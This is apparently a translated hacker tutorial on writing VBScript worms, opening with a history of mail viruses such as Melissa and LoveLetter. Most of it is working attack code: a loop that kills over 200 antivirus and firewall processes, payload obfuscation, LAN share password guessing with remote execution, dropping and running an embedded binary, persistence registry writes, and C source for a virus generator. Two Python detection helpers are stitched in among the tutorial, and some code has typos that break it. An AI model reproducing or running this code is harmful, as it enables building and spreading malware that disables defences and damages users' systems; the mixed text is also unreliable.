
Teaching You to Write a Super Script Virus

In March 1999, a computer virus named "Melissa" swept across computer networks in Europe and the United States. The virus used mail systems to copy and spread itself on a massive scale,
causing network congestion and even outages. In addition, it leaked confidential information as it spread.

May 2000: the "LoveLetter" virus appears. "LoveLetter" was a script virus that spread through Microsoft's e-mail system. The mail carried the subject "I Love You" and an attachment named "Love-Letter-for-you.txt.vbs"; once the attachment was opened in Microsoft's mail client, the system automatically copied the virus and sent it to every e-mail address in the user's address book. It spread several times faster than "Melissa".


January 21, 2001
A variant of the "Melissa" virus attacked Macintosh computers. The virus could infect Mac files;
the flood of e-mail it generated could clog servers, and it modified Microsoft Word settings and infected documents and templates.
The e-mail attachment carrying this "Melissa" variant was named "Anniv.DOC". This was the first time a virus of this type targeted the Macintosh.


February 15, 2001
On the 13th, Dutch police arrested a 20-year-old man who claimed to have created the "Kournikova" computer virus; he faces up to four years in prison.
The e-mail-borne "Kournikova" virus struck in Europe, the Americas and Asia on the 12th, leaving large backlogs of junk mail in e-mail systems;
systems slowed noticeably, and some companies simply shut their e-mail systems down. The Dutch man said he was a fan of the 19-year-old Russian tennis star Anna Kournikova.
The virus author said he was no programming expert: he simply downloaded virus code from the Internet and assembled the program from it.


May 6, 2001
A new malicious computer virus, "Happy Time" (Happytime/VBSHappytime.A.Worm), has begun spreading in China.
"Happy Time" is most likely a domestic virus; it is a worm similar to "LoveLetter". When a user receives a mail carrying "Happy Time" through Microsoft Outlook,
the virus is activated as soon as the mouse pointer rests on the infected message, whether or not the user opens it,
and it then immediately infects files on the hard disk. After infection, if the day and month of the system clock add up to 13,
the virus progressively deletes EXE and DLL files from the hard disk, eventually rendering the system unusable.


▲ May 11, 2001


The new "HomePage" virus is spreading worldwide; it is regarded as a "distant relative" of the "Kournikova" virus. The mail carrying it is titled "Homepage" and its body reads: "Hi, you've got to see this page, it's really cool." It carries an attachment named "HOMEPAGE.HTML.VBS". Once the user opens the attachment, the virus first copies itself and sends an infected mail to every address in the Microsoft Outlook address book. It then searches the Outlook inbox, deletes every message titled "Homepage", and opens several pornographic web pages. Fortunately the virus did not cause much damage: fewer than 10,000 computers were affected and disabled. Thanks to the time difference, antivirus companies in the United States had received reports from the eastern hemisphere and put defenses in place, successfully stopping the virus from spreading further.



                                         --------- Excerpted from "A Real Virus World"
                                                           中国毒客公社 (China Duke Commune) http://www.retcvc.com

Writing a script virus is extremely easy. Someone who knows nothing about programming but understands the Windows system and the registry well enough
can download a few virus samples from the Internet, read them carefully, and produce a new variant in a short time. Script viruses have only
a handful of distinguishing traits and involve little programming skill, which is why serious virus writers do not write viruses in VBScript. With the popularity of scripting languages today,
and Microsoft's introduction of WSH (Windows Script Host), these languages can cause even more trouble on a machine.
WSH is a service that lets Visual Basic Script and JScript scripts run under Windows the way batch files run from the command line:
a script can create Windows COM/OLE objects and use their methods, properties and events.
Because script viruses are easy to write, they are also easy to remove and defend against; articles on how to guard against them are everywhere on the net.
People develop, and viruses must evolve too, ha.


                                                    Begin

1. Many of today's antivirus products can already judge unknown script viruses, so to survive a virus must protect itself better:
  
(1). The virus makes heavy use of WMI so that it can kill the processes of antivirus software or firewalls. Here is a piece of code:
do
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
fv = Array("Notepad.exe", "pccguide.exe", "pccclient.exe","Rfw.exe", "DAVPFW.exe", "vpc32.exe", "ravmon.exe", "debu.exe", "scan.exe", "mon.exe", "vir.exe", "iom.exe", "ice.exe", "anti.exe", "fir.exe", "prot.exe", "secu.exe", "dbg.exe", "pcc.exe", "avk.exe", "spy.exe", "pcciomon.exe", "pccmain.exe", "pop3trap.exe", "webtrap.exe", "vshwin32.exe", "vsstat.exe", "navapw32.exe", "lucomserver.exe", "lamapp.exe", "atrack.exe", "nisserv.exe", "vavrunr.exe", "navwnt.exe", "pview95.exe", "luall.exe", "avxonsol.exe", "avsynmgr.exe", "symproxysvc.exe", "regedit.exe", "smtpsvc.exe", "moniker.exe", "program.exe", "explorewclass.exe", "rn.exe", "ms.exe", "microsoft.exe", "office.exe", "smtpsvc.exe", "avconsol.exe", "avsunmgr.exe", "vsstat.exe", "navapw32.exe", "navw32.exe", "nmain.exe", "luall.exe", "lucomserver.exe", "iamapp.exe", "atrack.exe", "nisserv.exe", "rescur32.exe", "nisum.exe", " navlu32.exe", "navrunr.exe", "pview95.exe", "f-stopw.exe", "f-prot95.exe", "pccwin98.exe", "fp-win.exe", "nvc95.exe", "norton.exe", "mcafee.exe", "antivir.exe", "webscanx.exe", "safeweb.exe", "cfinet.exe", "cfinet32.exe", "avp.exe", "lockdown2000.exe", "lockdown2002.exe", "zonealarm.exe", "wink.exe", "sirc32.exe", "scam32.exe", "regedit.exe", "tmoagent.exe", "tmntsrv.exe", "tmproxy.exe", "tmupdito.exe", "tsc.exe", "krf.exe", "kpfw32.exe", "_avpm.exe", "autodown.exe", "avkser.exe", "avpupd.exe", "blackd.exe", "cfind.exe", "cleaner.exe", "ecengine.exe", "fp-win.exe", "iamserv.exe", "lcloadnt.exe", "lookout.exe", "n32acan.exe", "navw32.exe", "normist.exe", "padmin.exe", "pccwin98.exe", "rav7win.exe", "smc.exe", "tca.exe", "vettray.exe", "ackwin32.exe", "avpnt.exe", "avpdos32.exeP", "avsched32.exe", "blackice.exe", "efinet32.exe", "esafe.exe", "ibmasn.exe", "icmoon.exe", "navapw32.exe", "nupgrade.exe", "pavcl.exe", "pcfwallicon.exe", "scanpm.exe", "sphinx.exe", "sphinx.exe", "tds2-98.exe", "vsscan40.exe", "webscanx.exe", "webscan.exe", "anti-trojan.exe", "ave32.exe", "avp.exe", "avpm.exe", "cfiadmin.exe", "dvp95.exe", "espwatch.exe", "ibmavsp.exe", "icsupp95.exe","jed.exe", "moolive.exe", "nisum.exeP", "nvc95.exe", "navsched.exe", "persfw.exe", "safeweb.exe", "scrscan.exe", "sweep95.exe", "tds2-nt.exe", "_avpcc.exe", "apvxdwin.exe", "avwupd32.exe", "cfiaudit.exe", "claw95ct.exe", "dv95_O.exe", "f-agnt94.exe", " findviru.exe", "iamapp.exe", "icload95.exe", "icssuppnt.exe", "mpftray.exe", "nmain.exe", "rav7.exe", "scan32.exe", "serv95.exe", "vshwin32.exe", "zonealarm.exe", "avpmon.exe", "avp32.exe", "kavsvc.exe", "mcagent.exe", "nvsvc32.exe", "mcmnhdlr.exe", "regsvc.exe", "mailmon.exe", "fp-win.exe", "mghtml.exe")
for Each fa in fv
Set colProcessList = objWMIService.ExecQuery ("Select * from Win32_Process Where Name = '"&fa&"'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
next
loop
The Array() holds the main process names of more than 200 antivirus and firewall products. You can of course define this array at the very start of the program
and use it in the infection routine below to delete those products' main executables. That said, this only achieves its goal if the virus
manages to run before the antivirus software does.

(2). The virus should use polymorphism as much as possible, with a new encryption algorithm. Admittedly, script encryption algorithms are very simple; the new Happy Time
does this well.
Execute DeCode("kqe`mv fcjjm ")
Function DeCode(Coded)
For i=1 To Len(Coded)
Curchar=Mid(Coded,i,1)
If Asc(Curchar) = 15 then Curchar=chr(10)
Else if Asc(Curchar) = 16 then Curchar=chr(13)
Else if Asc(Curchar) = 17 then Curchar=chr(32)
Else if Asc(Curchar) = 18 then Curchar=chr(9)
Else Curchar=chr(Asc(Curchar)-2)
end if
DeCode=Decode & Curchar
Next
End function
Below is a C example (the program has some problems; teachers, please advise ^_^)

#include <string.h>
#include <stdio.h>
main()
{
    FILE *in,*out,*read;
    char *exc="Execute DeCode(\"";
    char *excu="\")\n";
    char *func="Function DeCode(Coded)\nFor i=1 To Len(Coded)\nCurchar=Mid(Coded,i,1)\n";
    char *funct="If Asc(Curchar) = 15 then Curchar=chr(10)\nElse if Asc(Curchar) = 16 then Curchar=chr(13)\n";
    char *functi="Else if Asc(Curchar) = 17 then Curchar=chr(32)\nElse if Asc(Curchar) = 18 then Curchar=chr(9)\nElse Curchar=chr(Asc(Curchar)-2)\nend if\nDeCode=Decode & Curchar\nNext\nEnd function\n";
    char buf[100][101];
    char name[30];
    char ch;
    char *p;
    int i=0,j=0;
    gets(name);
    if((in=fopen(name,"r+"))==NULL)
    {
        printf("Can't open the file %",name);
        exit(0);
    }
    ch=getc(in);
    while(!feof(in))
    {
        if(ch==15) ch=10;
        else if(ch==16) ch=13;
        else if(ch==17) ch=32;
        else if(ch==18) ch=9;
        else ch=ch-2;
        fseek(in,-1L,1);
        fputc(ch,in);
        fseek(in,0L,1);
        ch=getc(in);
    }
    fclose(in);
    read=fopen(name,"r+");
    do
    {
        if(i>=100)
        {
            fclose(in);
        }
        p=fgets(buf,80,in);
        i++;
    }while(p!=NULL);
    fclose(read);
    out=fopen(name,"w+");
    fputs(exc,out);
    for(;j<i-1;j++)
    {
        fputs(buf[j],out);
    }
    fputs(excu,out);
    fputs(func,out);
    fputs(funct,out);
    fputs(functi,out);
    fclose(out);
}
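From the analyst's side, the shift-by-2 `Execute DeCode(...)` scheme and the split-literal `CreateObject` calls used throughout this page are easy to undo and to flag. The following Python helper is an added example, not code from the original page: it decodes the page's DeCode() transform and reports the evasion indicators described in sections (1), (2) and 4 in a script body. The sample script and its encoded statement are constructed.

```python
import re
from typing import Dict, List

# Inverse of the page's DeCode(): byte values 15/16/17/18 stand for
# LF, CR, space and tab; every other character is stored as Asc(c) + 2.
_SPECIAL = {15: "\n", 16: "\r", 17: " ", 18: "\t"}

# Execute DeCode("...") with a quote-free literal argument: an encoded text
# never contains a double quote, because the only plaintext character that
# would encode to chr(34) is the space, and spaces are written as byte 17.
_EXEC_DECODE = re.compile(r'execute\s+decode\s*\(\s*"([^"]*)"\s*\)', re.I)

# A run of string literals glued together with "+", e.g. "Scrip"+"ting."+...
_CONCAT_RUN = re.compile(r'(?:"[^"\r\n]*"\s*\+\s*)+"[^"\r\n]*"')

# ProgIDs that the page's samples split into pieces to defeat plain string scans.
_KNOWN_PROGIDS = {
    "scripting.filesystemobject",
    "wscript.shell",
    "wscript.network",
    "wshcontroller",
}

# Constructed sample (not a real worm): one encoded statement plus the
# split-literal CreateObject calls and the hex-unpacking loop seen on the page.
SAMPLE_SCRIPT = (
    'Execute DeCode("ouidqz\x11jgnnq")\n'
    'Set yu=CreateObject("Scrip"+"ting.F"+"ileSys"+"temOb"+"ject")\n'
    'Set aa=CreateObject("WSc"+"ript.S"+"hell")\n'
    'they = they & Chr("&h" & Mid(our, mine, 2))\n'
)


def decode_shift2(coded: str) -> str:
    """Reverse the DeCode() transform so an analyst can read the payload."""
    out = []
    for ch in coded:
        code = ord(ch)
        out.append(_SPECIAL[code] if code in _SPECIAL else chr(code - 2))
    return "".join(out)


def reveal_executed_code(script: str) -> List[str]:
    """Decode the argument of every Execute DeCode("...") found in the script."""
    return [decode_shift2(m.group(1)) for m in _EXEC_DECODE.finditer(script)]


def joined_literals(script: str) -> List[str]:
    """Rebuild each string the script assembles from concatenated literals."""
    rebuilt = []
    for run in _CONCAT_RUN.finditer(script):
        pieces = re.findall(r'"([^"\r\n]*)"', run.group(0))
        rebuilt.append("".join(pieces))
    return rebuilt


def indicators(script: str) -> Dict[str, bool]:
    """Flag the evasion tricks this page describes."""
    lowered = script.lower()
    rebuilt = {s.lower() for s in joined_literals(script)}
    return {
        # CreateObject ProgID split across "a"+"b"+"c" literals
        "split_progid": any(p in _KNOWN_PROGIDS for p in rebuilt),
        # Execute of a runtime-decoded string (the shift-by-2 scheme)
        "execute_decode": _EXEC_DECODE.search(script) is not None,
        # Chr("&h" & Mid(...)) loop that turns a hex string back into a binary
        "hex_unpack": 'chr("&h"' in lowered,
        # WMI query over Win32_Process followed by Terminate (the kill list)
        "wmi_process_kill": "win32_process" in lowered and ".terminate" in lowered,
    }


if __name__ == "__main__":
    print(reveal_executed_code(SAMPLE_SCRIPT))  # ['msgbox hello']
    print(joined_literals(SAMPLE_SCRIPT))
    print(indicators(SAMPLE_SCRIPT))
```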

2. A virus's attacks can extend to hosts with system vulnerabilities: a worm can use basic DOS commands and third-party hacker tools to attack those vulnerabilities.

3. The virus spreads by e-mail and over the LAN:

Attacking the LAN can use simplified network code, using WMI to run the virus body directly on the remote host; it can also crack share passwords (brute force would take too long
and is not really necessary):
Sub netshare()
Dim o1,o2,o3,o4,rand,dot,count,name,driveconnected, pwd,strings ,k
count = "0"
dot = "."
driveconnected="0"
set yu=createobject("scrip"+"ting."+"filesyst"+"emob"+"ject")
set net=createobject("wsc"+"ript.n"+"etwork")
set qq=createobject("WSc"+"ript.S"+"hell")
on error resume next
randomize
randaddress()

do
do while driveconnected ="0"
checkadress()
sharename()
pwd = ""
pqd = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For k = 1 to len(strings) step 1
net.mapnetworkdrive "I:", "\\" & "name" &"\C" , "& pwd & mid(strings,k,1)" , "& pqd & mid(strings,k,1)"
If instr(net.Body, Wrong) <> 0 Then
pwd = pwd & mid(strings,k,1)
End If
Next
' crack the share password
enumdrives()
loop
copy()
disconnectdrive()
qq "\\name\con\con",0
run ()
loop
end sub

function run()
Dim Controller, RemoteScript
Set Controller = WScript.CreateObject("WSHC"+"ontroller")
Set RemoteScript = Controller.CreateScript("system.vbe", "name")
WScript.ConnectObject RemoteScript, "remote_"
RemoteScript.Execute

Do While RemoteScript.Status <> 2
WScript.Sleep 100
Loop

WScript.DisconnectObject RemoteScript
remote_Error()
end function

Sub remote_Error
Dim theError
Set theError = RemoteScript.Error
WScript.Echo "Error " & theError.Number & " - Line: " & theError.Line & ", Char: " & theError.Character & vbCrLf & "Description: " & theError.Description
WScript.Quit -1
End Sub

Function disconnectdrive()
net.removenetworkdrive "I:"
driveconnected = "0"
end function

Function copy()
yu.copyfile dir2&"\system.vbe", "I:\windows\"
yu.copyfile dir2&"\system.vbe", "I:\windows\system32\"
yu.copyfile dir2&"\system.vbe", "I:\winnt\system32\"
yu.copyfile dir2&"\system.inf", "I:\winnt\system32\"
yu.copyfile dir2&"\system.inf", "I:\windows\system32\"
' copy to the target machine.
end function

Function checkaddress()
o4 = o4 +1
if o4 = "255" then randaddress()
end function

Function sharename()
name = " octa & dot & octb & dot & octc & dot & octd "
end function

Function enumdrives()
set you=net.enumnetworkdrives
For p = 0 to you.Count -1
if name = you.item(p) then
driveconnected = 1
else
driveconnected = 0
end if
Next
end function

Function randum()
rand = int((254 * rnd) + 1)
end function

Function randaddress()
if count < 50 then
o1=Int((16) * Rnd + 199)
coun=count + 1
else
randum()
o1=rand
end if
randum()
o2=rand
randum()
o3=rand
o4="1"
end function

4. The worm body can carry other viruses or trojans; see the following example:
Sub kill()
Set yu=CreateObject("Scrip"+"ting.F"+"ileSys"+"temOb"+"ject")
Set aa=CreateObject("WSc"+"ript.S"+"hell")
bb = "<hex dump of the embedded executable, omitted>"
vv = they(bb)
Set tt = yu.createtextfile(yu.getspecialfolder(0) & "\rav.exe",true)
tt.write vv
tt.close
aa.run yu.getspecialfolder(0) & "\rav.exe", 1, false
they(our)
end sub

Function they(our)
For mine = 1 To Len(our) Step 2
they = they & Chr("&h" & Mid(our, mine, 2))
Next
End Function
The pile of hexadecimal code between the quotes in bb="" above is the CIH virus body; it could just as well carry another virus or a trojan. You can first write a piece of C code that converts an *.exe into hexadecimal form,
write that into the virus body, and then use the function they(our) to restore it and run it ^_^ Below is a C example:

#include <string.h>
#include <stdio.h>
main()
{
    FILE *fp;
    char letter[250];
    int i,lenth;
    gets(letter);
    if((fp=fopen("c:\\letter.txt","w+"))==NULL)
    {
        printf("Can't open the file.\n");
        exit(1);
    }
    for(i=0;i<strlen(letter);i++)
        fprintf(fp,"%x00",letter,fp);
    fclose(fp);
}

5. Some advanced Windows users delete the filesystemobject entry from the registry to guard against script viruses. A new worm will check, as soon as it starts,
whether the system's filesystemobject entry exists and, if not, write it back. You can of course also register it under a different name, which some
antivirus products may then fail to recognize:
On Error Resume Next
Set wa=CreateObject("WSc"+"ript.S"+"hell")
tt=wa.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools")
if tt=1 then
wa.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 00000000, "REG_DWORD"
end if
uu=wa.RegRead("HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}")
if uu="" then
uu.RegWrite "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}" , "FileSystemObject", "REG_SZ"
end if
or
a.regdelete "HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\"
a.regdelete "HKEY_CLASSES_ROOT\Scripting.FileSystemObject\"
a.regwrite "HKEY_CLASSES_ROOT\wangzhitong\", "FileSystem Object", "REG_SZ"
a.regwrite "HKEY_CLASSES_ROOT\wangzhitong\CLSID\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ"
set yu=createobject("wangzhitong")
From then on, the system's filesystemobject entry is replaced by wangzhitong.
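Deleting the Scripting.FileSystemObject ProgID does not remove the component, and the trick above simply registers the same CLSID under a new name. The check below is an added example, not code from the original page: given a map of HKCR ProgIDs to their CLSID (a constructed sample here; `read_hkcr_progids()` reads the live registry on Windows via the standard `winreg` module), it reports every ProgID other than the standard one that resolves to the FileSystemObject CLSID quoted on this page.

```python
from typing import Dict, List

# CLSID of Scripting.FileSystemObject, as used in the registry code above.
FSO_CLSID = "{0D43FE01-F093-11CF-8940-00A0C9054228}"
STANDARD_FSO_PROGID = "scripting.filesystemobject"

# Constructed sample: the standard ProgID, an unrelated ProgID with a
# placeholder CLSID, and the alias the page registers. Case differs on
# purpose, because registry lookups are case-insensitive.
SAMPLE_PROGIDS = {
    "Scripting.FileSystemObject": FSO_CLSID,
    "Some.Other.Object": "{00000000-0000-0000-0000-000000000001}",
    "wangzhitong": "{0d43fe01-f093-11cf-8940-00a0c9054228}",
}


def find_fso_aliases(progid_to_clsid: Dict[str, str]) -> List[str]:
    """Return non-standard ProgIDs whose CLSID is the FileSystemObject CLSID."""
    aliases = []
    for progid, clsid in progid_to_clsid.items():
        if clsid.strip().upper() != FSO_CLSID:
            continue
        if progid.lower() == STANDARD_FSO_PROGID:
            continue
        aliases.append(progid)
    return sorted(aliases)


def fso_progid_missing(progid_to_clsid: Dict[str, str]) -> bool:
    """True when the standard ProgID was deleted (the 'advanced user' defence)."""
    return not any(p.lower() == STANDARD_FSO_PROGID for p in progid_to_clsid)


def read_hkcr_progids() -> Dict[str, str]:
    """Enumerate HKEY_CLASSES_ROOT\\<ProgID>\\CLSID on a live Windows host."""
    import winreg  # Windows only; imported lazily so the pure checks run anywhere
    result = {}
    index = 0
    while True:
        try:
            name = winreg.EnumKey(winreg.HKEY_CLASSES_ROOT, index)
        except OSError:
            break  # no more subkeys
        index += 1
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, name + r"\CLSID") as key:
                value, _ = winreg.QueryValueEx(key, "")
                result[name] = value
        except OSError:
            continue  # not a ProgID (no CLSID subkey), skip
    return result


if __name__ == "__main__":
    print(find_fso_aliases(SAMPLE_PROGIDS))       # ['wangzhitong']
    print(fso_progid_missing(SAMPLE_PROGIDS))    # False
```

On a real host the same report comes from `find_fso_aliases(read_hkcr_progids())`; an alias is a stronger signal than a missing ProgID, since the latter is exactly what the defensive deletion produces.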

6. How could a worm you wrote yourself tolerate other worms on the same system? So eliminate other virus programs as far as possible :)
  Of course you first have to analyze those virus programs; then just remove them.
Appendix: script virus generators
A virus generator makes it very easy to produce a virus; the Kournikova author, for instance, made his with vbswg. I have used many kinds of script virus generators,
but the viruses they produce are all very crude. Some people even call a script that writes the registry a "virus", and then loudly advertise the junk program they wrote, sigh;
I don't know what the big brothers in China are thinking. As I recall, vbswg 2.0 was written in VB, and that was a long time ago; real experts won't bother writing such things. After my college entrance exam I also wrote
a script virus generator. At first it felt like quite an achievement, but as I gradually came to understand the essence of programming, I found it a very boring program. Its source code is given below;
experts need not read it, it is not optimized, but newcomers may learn from it:



#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#define exit_success 0
#define again 1
#define m 4

int make();
int care();
void password(void);
void out(void);

main()
{
    char choose;
    clrscr();
    printf("*******************************************************************************\n");
    printf("This is a VBS virus made machine,it's only used to study,don't used to destory.\n");
    printf("                             Programmed by W.Z.T\n");
    printf("                                 Version 0.1\n");
    printf("*******************************************************************************\n");
    puts("\n\t1--Strat Make\t\t2--View Help\t\t3--Exit");
    while(again)
    {
        printf("choice:");
        scanf("%c",&choose);
        switch(choose)
        {
            case '1':
            {
                make();
                clrscr();
                return 0;
            }
            case '2':
            {
                clrscr();
                puts("I like Virus,so i write a machine which anybody can make a Virus much easiler.\n");
                puts("This Version is my first one,i will try to write a better one later.\n");
                out();
            }
            case '3':
            {
                exit(exit_success);
            }
            default:
            {
                puts("choice 1,2 or 3");
            }
        }
    }
}

void out(void)
{
    printf("\npause");
    getch();
    main();
}

void password(void)
{
    int i,j,y=0;
    char pwd[11+1],pass[]="wangzhitong";
    fflush(stdin);
    printf("If you want to use this function,please input the password.\n");
    for(j=0;;)
    {
        if((pwd[j]=getch())==13)
        {
            pwd[j]='\0';
            break;
        }
        else if(pwd[j]==8)
        {
            if(y!=0)
            {
                printf("\b");
                y--;
                j--;
            }
            putchar(0);
            printf("\b");
        }
        else if(j==11)
            continue;
        else
        {
            printf("*");
            y++;
            j++;
        }
    }
    if(strcmp(pwd,pass)==0)
    {
        printf("\ndone.\n");
    }
    else
    {
        printf("password error.\n");
    }
}

int make()
{
    FILE *fp,*fp1;
    int i,j,aa,bb,cc,dd,ee,ff,gg,hh,jjj,kkk,lll,y=0,word=0,number=0;
    char ch,w[5],*vc=w;
    char subject[200],*sub=subject;
    char body[400],*bo=body;
    char string[100],*pop=string;
    char road[100],name2[40],road2[100],time[20],web[100];
    char pwd[11+1],pass[]="wangzhitong";
    char *ext1[27]={"txt","vbs","vbe","html","htm","bak","dll","pfg","ppl","c","bin","sig","vdb","dat","doc","xls","tsk","tmp","vdb","vlg","dsc","ptn","set","log","cfg","idx","rec"};
    char **pl=ext1;
    char str1[25][100]={"(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\""};
    char str2[]="\") or";
    char *str[27],**pa=str;
    char *a="\non error resume next\nset fso=createobject(\"scripting.filesystemobject\")\nset a=createobject(\"wscript.shell\")\nset dir1=fso.getspecialfolder(0)\nset dir2=fso.getspecialfolder(1)\nset k=fso.getfile(wscript.scriptfullname)\n";
    char *b="k.copy(dir2&\"\\system.vbe\")\n";
    char *c="k.copy(dir1&\"\\windows.vbe\")\n";
    char *d="set ag=fso.createtextfile(dir1&\"\kill.vbe\")\nag.writeline \"on error resume next\"\nag.writeline \"do\"\nag.writeline \"strComputer=\"\".\"\"\"\n";
    char *e="ag.writeline \"set objWMIService=GetObject(\"\"winmgmts:\"\" & \"\"{impersonationLevel=impersonate}!\\\\\"\" & strComputer & \"\"\\root\\cimv2\"\")\"\n";
    char *f="ag.writeline \"fv=Array(\"\"notepad.exe\"\",\"\"pccguide.exe\"\",\"\"pccclient.exe\"\",\"\"rfw.exe\"\",\"\"davpfw.exe\"\",\"\"vpc32.exe\"\",\"\"ravmon.exe\"\")\"\n";
    char *g="ag.writeline \"for Each fa in fv\"\nag.writeline \"Set colProcessList=objWMIService.ExecQuery (\"\"Select * from Win32_Process Where Name=\'\"\"&fa&\"\"\'\"\")\"\nag.writeline \"For Each objProcess in colProcessList\"\n";
    char *h="ag.writeline \"objProcess.Terminate()\"\nag.writeline \"Next\"\nag.writeline \"next\"\nag.writeline \"loop\"\nag.close\na.run fso.getspecialfolder(0) & \"\\kill.vbe\"\nset ai=fso.getfile(dir1&\"\\kill.vbe\")\n";
    char *ii="ai.attributes=ai.attributes+2\n";
    char *jj="set cc=fso.createtextfile(dir1&\"\\Run.bat\")\ncc.writeline \"@echo off\"\ncc.writeline \"cls\"\ncc.writeline \"echo              %date% %time%\"\ncc.writeline \"echo    Chinese hacker is the best!\"\n";
    char *k="cc.writeline \"prompt $P$G$$$_*tthacker@eyou.com*\"\ncc.writeline \"echo on\"\ncc.close\nset at=fso.getfile(dir1&\"\\Run.bat\")\nat.attributes=at.attributes+2\n";
    char *l="set sii=fso.createtextfile(dir2&\"\\event.ini\")\nsii.writeline \"[Levels]\"\nsii.writeline \"Enabled=1\"\nsii.writeline \"Count=6\"\nsii.writeline \"Level1=000-Unknowns\"\nsii.writeline \"000-UnknownsEnabled=1\"\n";
    char *mm="sii.writeline \"Level2=100-Level 100\"\nsii.writeline \"100-Level 100Enabled=1\"\nsii.writeline \"Level3=200-Level 200\"\nsii.writeline \"200-Level 200Enabled=1\"\n";
    char *nn="sii.writeline \"Level4=300-Level 300\"\nsii.writeline \"300-Level 300Enabled=1\"\nsii.writeline \"Level5=400-Level 400\"\nsii.writeline \"400-Level 400Enabled=1\"\n";
    char *oo="sii.writeline \"Level6=500-Level 500\"\nsii.writeline \"500-Level 500Enabled=1\"\nsii.writeline \"\"\n";
    char *pp="sii.writeline \"[000-Unknowns]\"\nsii.writeline \"UserCount=0\"\nsii.writeline \"EventCount=0\"\nsii.writeline \"\"\n";
    char *qq="sii.writeline \"[100-Level 100]\"\nsii.writeline \"User1=*!*@*\"\nsii.writeline \"UserCount=1\"\nsii.writeline \"Event1=ON JOIN:#:/dcc tsend $nick \" & fso.getspecialfolder(1) & \"\\system.vbe\"\nsii.writeline \"EventCount=1\"\n";
    char *rr="sii.writeline \"\"\nsii.writeline \"[200-Level 200]\"\nsii.writeline \"UserCount=0\"\nsii.writeline \"EventCount=0\"\nsii.writeline \"\"\n";
    char *ss="sii.writeline \"[300-Level 300]\"\nsii.writeline \"UserCount=0\"\nsii.writeline \"EventCount=0\"\nsii.writeline \"\"\nsii.writeline \"[400-Level 400]\"\nsii.writeline \"UserCount=0\"\nsii.writeline \"EventCount=0\"\n";
    char *tt="sii.writeline \"\"\nsii.writeline \"[500-Level 500]\"\nsii.writeline \"UserCount=0\"\nsii.writeline \"EventCount=0\"\nsii.close\nset wi=fso.getfile(dir2&\"\\event.ini\")\nwi.attributes=attributes+2\n";
    char *uu="set rei=fso.createtextfile(dir1&\"\\check.vbe\")\nrei.writeline \"on error resume next\"\nrei.writeline \"dim bb,aa,cc\"\nrei.writeline \"set cc=createobject(\"\"wscript.shell\"\")\"\n";
    char *vv="rei.writeline \"aa=minute(time)\"\nrei.writeline \"bb=aa\"\nrei.writeline \"do\"\nwei.writeline \"bb=minute(time)\"\nrei.writeline \"loop until aa>=bb+1\"\nrei.writeline \"cc.run \"\"system.vbe\"\"\"\nrei.close\n";
    char *ww="a.run \"check.vbe\"\nset ahd=fso.getfile(dir1&\"\\check.vbe\")\nahd.attributes=attributes+2\nset ah=fso.getfile(dir2&\"\wscript.exe\")\nah.attributes=attritutes+2\n";
    char *xx="set bh=fso.getfile(dir2&\"\\cscript.exe\")\nbh.attributes=attributes+2\nset apq=fso.createtextfile(dir2&\"\system.inf\")\napq.writeline \"[Autorun]\"\napq.writeline \"open=system.vbs\"\napq.close\n";
    char *yy="set pr=fso.getfile(dir2&\"\\system.inf\")\npr.attributes=attributes+2\nkill()\nregruns()\nlistadriv()\njuyu()\nmail()\n";
    char *kill1="sub kill()\nset fso=createobject(\"scripting.filesystemobject\")\nset aa=createobject(\"wscript.shell\")\nbb = \"";
    char *kill2="vv = they(bb)\nset tt=fso.createtextfile(fso.getspecialfolder(0) & \"\\rav.exe\",true)\ntt.write vv\ntt.close\naa.run fso.getspecialfolder(0) & \"\\rav.exe\",1,false\ntehy(our)\nend sub\n";
    char *kill3="Function they(our)\nFor mine=1 To Len(our) Step 2\nthey = they & Chr(\"&h\" & Mid(our,mine, 2))\nNext\nEnd Function\n";
    char *reg1="sub regruns()\non error resume next\nset a=createobject(\"wscript.shell\")\nkj=\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\\"\nki=\"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\\"\n";
    char *reg2="a.regwrite kj&\"Internet Settings\\NoNetAutodial\",01,\"REG_BINARY\"\na.run \"RUNDLL32.exe shell32,dll,SHExitWindowsEx2\"\na.run \"ping -1 6500 -t ";
    char *reg3="a.regwrite kj&\"Policies\\System\\DisableRegistryTools\",\"00000001\",\"REG_DWORD\"\n";
    char *reg4="a.regwrite kj&\"Policies\\Explorer\\NoFolderOptions\",\"00000001\",\"REG_DWORD\"\n";
    char *reg5="a.regwrite kj&\"Policies\\Uninstall\\NoAddFromCDorFloppy\"\"00000001\",\"DWORD\"\n";
    char *reg6="a.regwrite kj&\"Policies\\Uninstall\NoAddRemovePrograms\",\"00000001\",\"REG_DWORD\"\n";
    char *reg7="a.regwrite kj&\"Policies\\Uninstall\NoAddRemovePage\",\"00000001\",\"REG_DWORD\"\n";
    char *reg8="a.regwrite kj&\"Policies\\Explorer\\Advanced\\folder\\Hidden\\SHOWALL\\checkedValue\",\"00000001\",\"REG_DWORD\"\n";
    char *reg9="a.regwrite \"HKLM\\Software\\CLASSES\\.reg\",\"txtfile\"\n";
    char *reg10="a.regwrite \"HKLM\\Software\\Microsoft\\Command Processor\\AutoRun\",\"%systemroot%\\run.bat&system32.vbe\",\"REG_SZ\"\n";
    char *reg11="a.retwrite \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\system\",dir1&\"\\windows.vbe\"\nend sub\n";
